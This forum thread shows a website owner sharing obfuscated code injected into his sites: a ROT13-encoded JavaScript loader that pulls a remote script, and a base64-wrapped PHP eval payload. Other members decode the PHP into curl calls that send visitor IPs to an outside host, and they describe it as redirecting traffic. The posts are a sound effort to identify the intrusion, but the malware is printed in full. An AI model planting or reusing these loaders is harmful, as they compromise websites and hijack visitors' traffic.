suspicious code...

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • GFED
    Confirmed User
    • May 2002
    • 8121

    #1

    suspicious code...

    Code:
    <script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://jjj.genssvperirahr.arg/ybnqnq.wf?hfreanzr=vaw\"></fpevcg>"));</script>
    https://www.flow.page/savethechildren
  • pornmasta
    Too lazy to set a custom title
    • Jun 2006
    • 20016

    #2
    Code:
    http://www.trafficrevenue.net/loadad.js?username=inj

    Comment

    • GFED
      Confirmed User
      • May 2002
      • 8121

      #3
      thank you. i'm finding that code injected into some of my websites along with hits to icetraffic.com
      https://www.flow.page/savethechildren

      Comment

      • GFED
        Confirmed User
        • May 2002
        • 8121

        #4
        Code:
        eval(base64_decode('JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ109QXJyYXkoYmFzZTY0X2RlY29kZSgnYVcxaCcgLidaMlZrJyAuJ1onIC4nWE4wY205NScpLGJhc2U2NF9kZWNvZGUoJ1kzVnknIC4nYkY5cGJtJyAuJ2wwJyksYmFzZTY0X2RlY29kZSgnWTNWeWJGOXpaWFJ2Y0hRPScpLGJhc2U2NF9kZWNvZGUoJ2MzUnknIC4nYm1OJyAuJ3RjJyAuJ0E9PScpLGJhc2U2NF9kZWNvZGUoJ2RYSnNaJyAuJ1c1amInIC4nMicgLidSJyAuJ2wnKSxiYXNlNjRfZGVjb2RlKCdZMycgLidWeWJGJyAuJzl6WlhSdicgLidjJyAuJ0hRPScpLGJhc2U2NF9kZWNvZGUoJ2MzUnknIC4nY21WMicpLGJhc2U2NF9kZWNvZGUoJ1kzJyAuJ1YnIC4neWJGOXpaJyAuJ1gnIC4nUnZjSCcgLidRPScpLGJhc2U2NF9kZWNvZGUoJ1knIC4nM1Z5YkY5JyAuJ3paWCcgLidSdmNIUT0nKSxiYXNlNjRfZGVjb2RlKCdZM1YnIC4neWJGOWxlR1ZqJyksYmFzZTY0X2RlY29kZSgnWTNWeScgLidiRjknIC4namJHOXpaUT09JyksYmFzZTY0X2RlY29kZSgnWVhKeVlYbGZiVycgLidGJyAuJ3cnKSk7ID8+PD8gZnVuY3Rpb24gXzE1NDExOTQ4MTcoJGkpeyRhPUFycmF5KCdTRlJVVUY5WVgwWlBVbGRCJyAuJ1VrUkZSRjlHVDFJPScsJ1NGUlVVRjlZWDBaUFVsJyAuJ2RCVWtSRlJGOScgLidHVDFJJyAuJz0nLCcnIC4nUycgLidGUlVVRjknIC4nWVgxSkYnIC4nUVV4ZlNWQScgLic9JywnJyAuJ1NGUicgLidVVUYnIC4nOVlYMUpGUVV4JyAuJ2ZTVkE9JywnJyAuJ1UnIC4na1ZOJyAuJ1QxJyAuJ1JGWDBGRVJGST0nLCdhSFIwY0RvJyAuJ3ZMMk55ZGknIC4nNWonIC4nWXk5alknIC4neTgvWXonIC4nMD0nKTtyZXR1cm4gYmFzZTY0X2RlY29kZSgkYVskaV0pO30gPz48P3BocCBmdW5jdGlvbiBsX18wKCl7aWYoaXNzZXQoJF9TRVJWRVJbXzE1NDExOTQ4MTcoMCldKSl7JF8wPSRfU0VSVkVSW18xNTQxMTk0ODE3KDEpXTt9ZWxzZWlmKGlzc2V0KCRfU0VSVkVSW18xNTQxMTk0ODE3KDIpXSkpeyRfMD0kX1NFUlZFUltfMTU0MTE5NDgxNygzKV07fWVsc2V7JF8wPSRfU0VSVkVSW18xNTQxMTk0ODE3KDQpXTt9cmV0dXJuICRfMDtpZigocm91bmQoMCsxMjY2LjY2NjY2NjY2NjcrMTI2Ni42NjY2NjY2NjY3KzEyNjYuNjY2NjY2NjY2Nykrcm91bmQoMCsxOTEpKT5yb3VuZCgwKzEyNjYuNjY2NjY2NjY2NysxMjY2LjY2NjY2NjY2NjcrMTI2Ni42NjY2NjY2NjY3KXx8IGxfXzAoJF8xLCRfMCwkXzEsJF8yKSk7ZWxzZXskR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVswXSgkXzIsJF9TRVJWRVIsJF8yLCRfU0VSVkVSKTt9fSRfMT0kR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxXSgpOyRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzJdKCRfMSwxMDAwMixfMTU0MTE5NDgxNyg1KSAubF9fMCgpKTtpZigocm91bmQoMCsyNjErMjYxKzI2MSlecm91bmQoMCsxOTUuNzUrMTk1Ljc1KzE5NS43NSsxOTUuNzUpKSYmICRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzNdKCRfU0VSVkVSLCRfU0VSVkVSKSkkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVs0XSgkXzIsJF9TRVJWRVIpOyRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzVdKCRfMSwxOTkxMyxyb3VuZCgwKzAuMiswLjIrMC4yKzAuMiswLjIpKTtpZigocm91bmQoMCszMzk0KV5yb3VuZCgwKzg0OC41Kzg0OC41Kzg0OC41Kzg0OC41KSkmJiAkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVs2XSgkXzEpKSRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzddKCRfMSk7JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ11bOF0oJF8xLDEzLHJvdW5kKDArMS4yKzEuMisxLjIrMS4yKzEuMikpOyRfMz1yb3VuZCgwKzc4Mi4zMzMzMzMzMzMzMys3ODIuMzMzMzMzMzMzMzMrNzgyLjMzMzMzMzMzMzMzKTskXzI9JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ11bOV0oJF8xKTskR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxMF0oJF8xKTtlY2hvICRfMjt3aGlsZShyb3VuZCgwKzQ3MjYpLXJvdW5kKDArMjM2MysyMzYzKSkkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxMV0oJF9TRVJWRVIpOw=='));
        https://www.flow.page/savethechildren

        Comment

        • pornmasta
          Too lazy to set a custom title
          • Jun 2006
          • 20016

          #5
          Originally posted by GFED
          Code:
          eval(base64_decode('JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ109QXJyYXkoYmFzZTY0X2RlY29kZSgnYVcxaCcgLidaMlZrJyAuJ1onIC4nWE4wY205NScpLGJhc2U2NF9kZWNvZGUoJ1kzVnknIC4nYkY5cGJtJyAuJ2wwJyksYmFzZTY0X2RlY29kZSgnWTNWeWJGOXpaWFJ2Y0hRPScpLGJhc2U2NF9kZWNvZGUoJ2MzUnknIC4nYm1OJyAuJ3RjJyAuJ0E9PScpLGJhc2U2NF9kZWNvZGUoJ2RYSnNaJyAuJ1c1amInIC4nMicgLidSJyAuJ2wnKSxiYXNlNjRfZGVjb2RlKCdZMycgLidWeWJGJyAuJzl6WlhSdicgLidjJyAuJ0hRPScpLGJhc2U2NF9kZWNvZGUoJ2MzUnknIC4nY21WMicpLGJhc2U2NF9kZWNvZGUoJ1kzJyAuJ1YnIC4neWJGOXpaJyAuJ1gnIC4nUnZjSCcgLidRPScpLGJhc2U2NF9kZWNvZGUoJ1knIC4nM1Z5YkY5JyAuJ3paWCcgLidSdmNIUT0nKSxiYXNlNjRfZGVjb2RlKCdZM1YnIC4neWJGOWxlR1ZqJyksYmFzZTY0X2RlY29kZSgnWTNWeScgLidiRjknIC4namJHOXpaUT09JyksYmFzZTY0X2RlY29kZSgnWVhKeVlYbGZiVycgLidGJyAuJ3cnKSk7ID8+PD8gZnVuY3Rpb24gXzE1NDExOTQ4MTcoJGkpeyRhPUFycmF5KCdTRlJVVUY5WVgwWlBVbGRCJyAuJ1VrUkZSRjlHVDFJPScsJ1NGUlVVRjlZWDBaUFVsJyAuJ2RCVWtSRlJGOScgLidHVDFJJyAuJz0nLCcnIC4nUycgLidGUlVVRjknIC4nWVgxSkYnIC4nUVV4ZlNWQScgLic9JywnJyAuJ1NGUicgLidVVUYnIC4nOVlYMUpGUVV4JyAuJ2ZTVkE9JywnJyAuJ1UnIC4na1ZOJyAuJ1QxJyAuJ1JGWDBGRVJGST0nLCdhSFIwY0RvJyAuJ3ZMMk55ZGknIC4nNWonIC4nWXk5alknIC4neTgvWXonIC4nMD0nKTtyZXR1cm4gYmFzZTY0X2RlY29kZSgkYVskaV0pO30gPz48P3BocCBmdW5jdGlvbiBsX18wKCl7aWYoaXNzZXQoJF9TRVJWRVJbXzE1NDExOTQ4MTcoMCldKSl7JF8wPSRfU0VSVkVSW18xNTQxMTk0ODE3KDEpXTt9ZWxzZWlmKGlzc2V0KCRfU0VSVkVSW18xNTQxMTk0ODE3KDIpXSkpeyRfMD0kX1NFUlZFUltfMTU0MTE5NDgxNygzKV07fWVsc2V7JF8wPSRfU0VSVkVSW18xNTQxMTk0ODE3KDQpXTt9cmV0dXJuICRfMDtpZigocm91bmQoMCsxMjY2LjY2NjY2NjY2NjcrMTI2Ni42NjY2NjY2NjY3KzEyNjYuNjY2NjY2NjY2Nykrcm91bmQoMCsxOTEpKT5yb3VuZCgwKzEyNjYuNjY2NjY2NjY2NysxMjY2LjY2NjY2NjY2NjcrMTI2Ni42NjY2NjY2NjY3KXx8IGxfXzAoJF8xLCRfMCwkXzEsJF8yKSk7ZWxzZXskR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVswXSgkXzIsJF9TRVJWRVIsJF8yLCRfU0VSVkVSKTt9fSRfMT0kR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxXSgpOyRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzJdKCRfMSwxMDAwMixfMTU0MTE5NDgxNyg1KSAubF9fMCgpKTtpZigocm91bmQoMCsyNjErMjYxKzI2MSlecm91bmQoMCsxOTUuNzUrMTk1Ljc1KzE5NS43NSsxOTUuNzUpKSYmICRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzNdKCRfU0VSVkVSLCRfU0VSVkVSKSkkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVs0XSgkXzIsJF9TRVJWRVIpOyRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzVdKCRfMSwxOTkxMyxyb3VuZCgwKzAuMiswLjIrMC4yKzAuMiswLjIpKTtpZigocm91bmQoMCszMzk0KV5yb3VuZCgwKzg0OC41Kzg0OC41Kzg0OC41Kzg0OC41KSkmJiAkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVs2XSgkXzEpKSRHTE9CQUxTWydfNDk1NTY0OTU2XyddWzddKCRfMSk7JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ11bOF0oJF8xLDEzLHJvdW5kKDArMS4yKzEuMisxLjIrMS4yKzEuMikpOyRfMz1yb3VuZCgwKzc4Mi4zMzMzMzMzMzMzMys3ODIuMzMzMzMzMzMzMzMrNzgyLjMzMzMzMzMzMzMzKTskXzI9JEdMT0JBTFNbJ180OTU1NjQ5NTZfJ11bOV0oJF8xKTskR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxMF0oJF8xKTtlY2hvICRfMjt3aGlsZShyb3VuZCgwKzQ3MjYpLXJvdW5kKDArMjM2MysyMzYzKSkkR0xPQkFMU1snXzQ5NTU2NDk1Nl8nXVsxMV0oJF9TRVJWRVIpOw=='));
          it gives this:

          $GLOBALS['_495564956_']=Array(base64_decode('aW1h' .'Z2Vk' .'Z' .'XN0cm95'),base64_decode('Y3Vy' .'bF9pbm' .'l0'),base64_decode('Y3VybF9zZXRvcHQ='),base64_de code('c3Ry' .'bmN' .'tc' .'A=='),base64_decode('dXJsZ' .'W5jb' .'2' .'R' .'l'),base64_decode('Y3' .'VybF' .'9zZXRv' .'c' .'HQ='),base64_decode('c3Ry' .'cmV2'),base64_decode('Y3' .'V' .'ybF9zZ' .'X' .'RvcH' .'Q='),base64_decode('Y' .'3VybF9' .'zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9leGVj'),base64_decode('Y3Vy' .'bF9' .'jbG9zZQ=='),base64_decode('YXJyYXlfbW' .'F' .'w')); ?><? function _1541194817($i){$a=Array('SFRUUF9YX0ZPUldB' .'UkRFRF9GT1I=','SFRUUF9YX0ZPUl' .'dBUkRFRF9' .'GT1I' .'=','' .'S' .'FRUUF9' .'YX1JF' .'QUxfSVA' .'=','' .'SFR' .'UUF' .'9YX1JFQUx' .'fSVA=','' .'U' .'kVN' .'T1' .'RFX0FERFI=','aHR0cDo' .'vL2Nydi' .'5j' .'Yy9jY' .'y8/Yz' .'0=');return base64_decode($a[$i]);} ?><?php function l__0(){if(isset($_SERVER[_1541194817(0)])){$_0=$_SERVER[_1541194817(1)];}elseif(isset($_SERVER[_1541194817(2)])){$_0=$_SERVER[_1541194817(3)];}else{$_0=$_SERVER[_1541194817(4)];}return $_0;if((round(0+1266.6666666667+1266.6666666667+12 66.6666666667)+round(0+191))>round(0+1266.66666666 67+1266.6666666667+1266.6666666667)|| l__0($_1,$_0,$_1,$_2));else{$GLOBALS['_495564956_'][0]($_2,$_SERVER,$_2,$_SERVER);}}$_1=$GLOBALS['_495564956_'][1]();$GLOBALS['_495564956_'][2]($_1,10002,_1541194817(5) .l__0());if((round(0+261+261+261)^round(0+195.75+1 95.75+195.75+195.75))&& $GLOBALS['_495564956_'][3]($_SERVER,$_SERVER))$GLOBALS['_495564956_'][4]($_2,$_SERVER);$GLOBALS['_495564956_'][5]($_1,19913,round(0+0.2+0.2+0.2+0.2+0.2));if((round (0+3394)^round(0+848.5+848.5+848.5+848.5))&& $GLOBALS['_495564956_'][6]($_1))$GLOBALS['_495564956_'][7]($_1);$GLOBALS['_495564956_'][8]($_1,13,round(0+1.2+1.2+1.2+1.2+1.2));$_3=round(0+ 782.33333333333+782.33333333333+782.33333333333);$ _2=$GLOBALS['_495564956_'][9]($_1);$GLOBALS['_495564956_'][10]($_1);echo $_2;while(round(0+4726)-round(0+2363+2363))$GLOBALS['_495564956_'][11]($_SERVER);

          Comment

          • pornmasta
            Too lazy to set a custom title
            • Jun 2006
            • 20016

            #6
            use this tool if you need to solve all the base64 decode:
            http://www.opinionatedgeek.com/dotne.../base64decode/

            (it sucsk to do)

            example:
            base64_decode('dXJsZ' .'W5jb' .'2' .'R' .'l')
            >>

            base64_decode('dXJsZW5jb2Rl')

            == "urlencode"
            Last edited by pornmasta; 01-19-2012, 09:16 PM.

            Comment

            • GFED
              Confirmed User
              • May 2002
              • 8121

              #7
              Originally posted by pornmasta
              use this tool if you need to solve all the base64 decode:
              http://www.opinionatedgeek.com/dotne.../base64decode/
              thank you
              https://www.flow.page/savethechildren

              Comment

              • Dirty F
                Too lazy to set a custom title
                • Jul 2001
                • 59204

                #8
                Fucking nerds.

                Comment

                • CurrentlySober
                  Too lazy to wipe my ass
                  • Aug 2002
                  • 38941

                  #9
                  Originally posted by pornmasta

                  == "urlencode"
                  i like urine code...


                  👁️ 👍️ 💩

                  Comment

                  • ArsewithClass
                    So Fucking Banned
                    • Mar 2007
                    • 7957

                    #10
                    Can I ask, as I don't understand this code, what was suspicious about it? What does it actually do?

                    Comment

                    • anexsia
                      Confirmed User
                      • May 2010
                      • 5735

                      #11
                      Originally posted by ArsewithClass
                      Can I ask, as I don't understand this code, what was suspicious about it? What does it actually do?
                      It redirects traffic to someone else's website.

                      Comment

                      Working...